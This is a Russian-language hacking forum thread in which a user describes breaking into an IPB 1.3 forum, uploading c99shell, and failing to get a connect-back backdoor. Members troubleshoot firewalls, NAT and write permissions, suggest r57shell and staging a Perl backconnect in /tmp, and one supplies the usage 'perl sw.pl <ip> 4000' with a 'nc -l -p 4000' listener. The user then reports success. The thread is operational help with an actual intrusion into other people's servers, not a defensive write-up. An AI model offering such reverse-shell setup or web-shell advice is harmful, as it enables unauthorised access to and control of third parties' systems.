Проблема с коннбэк-бэкдором
 

Всем привет!
Проблема следующая: сломал, я значит форум ipb 1.3 final, залил шелл и хотел замутить connback-backdoor (я использовал c99shell). Но запустив nc на локальной машине, я так и не дождался коннекта.
Пробовал другие веб-шеллы и серваки, то же самое. Не коннектится, блин...
Может у меня не хватает прав или чего еще?
Спасибо!

может фаервол

На нескольких сайтах подряд? Вряд ли, да и сомневаюсь что фаер закрывает и исходящие коннекты...

а что он потвоему вообще делает? лол.

Так то оно так, я имел ввиду что на тех серверах фаер плохо настроен

Попробуй поменять порт коннбэка. Например на 4000 и обязательно отключи персональный файерволл, если он у тебя есть. Ведь от бэкдора для твоего компа будет входящее соединение, а фаер на неизвестные порты их блокирует. Плюс если у тебя сокс, то с99 неправильно определит твой ip. А бэкконнект возможен только на реальный ip. Если у тебя ВПН, опять таки коннект возможен только на твой "родной" ip.
Свой ip я,например, определяю прогой Angry ip scanner.

Порт менял. Это точно не сокс и не vpn. Фаер мой молчит.
Что еще может быть? Может прав мало? Хотя они не nobody...

ФАЕР НАДО ОТКЛЮЧАТЬ. Можно конечно с правилами мутить, но не стоит.

Хм, извиняй конечно, но не через нат-ли ты сидишь? У тебя белый ИП?
Если белый, то скорее всего просто прав не хватает...хотя...подними у себя апач, настрой права, и протесть на себе ;)

Ната нет, а что такое белый ip?
У себя нормально работает.
Я вот что еще попробовал. Закачал сишный конбэк, хотел скомпилить, но в ответ шелл ничего не выдал. Может я не могу вообще запускать никакие бинарники?
Вообще, парни, я запутался, если честно...((

К тебе вообще извне могут приконнектиться???
Под nobody врядли у тебя сищный бек скомпилится...
Ты точно УВЕРЕН что ты не за НАТом сидишь?

Попробуй бэк на r57shell'e
ЗЫ У тебя случайно Ip не 192.168?

+1 и попробуй back на перле тоже. ПЛЮС ОТРУБИ ФАЕР!!!!

1. Да я точно уверен, что я сижу не за NAT'ом и что мой ip не 192.168.*.* ))
2. Пробовал несколько шеллов, в том числе и r57shell. То же самое ((
3. Конбэк на перле тоже пробовал.
4. Фаер отрублен.

P.S. C99Shell пишет "Can't download sources!"

Хе хе. У тебя нет даже прав на запись=( Ищи папку с правами на запись, начнем с этого. Попробуй зайти в /tmp и залить туда конбэк на перле сторонний. О результатах отпишись.

Хм...скажи свой ип в ПМ и порт слушай в nc - проверим в чем дело - в прове твоем или в хостах(ну или самом коннбеке) :)))

Хм...странно, но ведь в папку со смайликами есть доступ у всех? Или я ошибаюсь?
З.Ы. Хорошо было бы исходник конбэка на перле, если не трудно

Я попробовал запустить бэкдор из /tmp, но wget и gcc не хотят работать...

Перловый конбэк
Выручал меня бессчетное кол-во раз.
Юзать: Perl sw.pl 127.0.0.1 4000
Вместо 127.0.0.1 ставь СВОЙ ip адрес.
Соответственно на твоем компе должен висеть netcat: nc -l -p 4000

За конбэк респект! Щас попробую!

Все получилось, спасибо большое!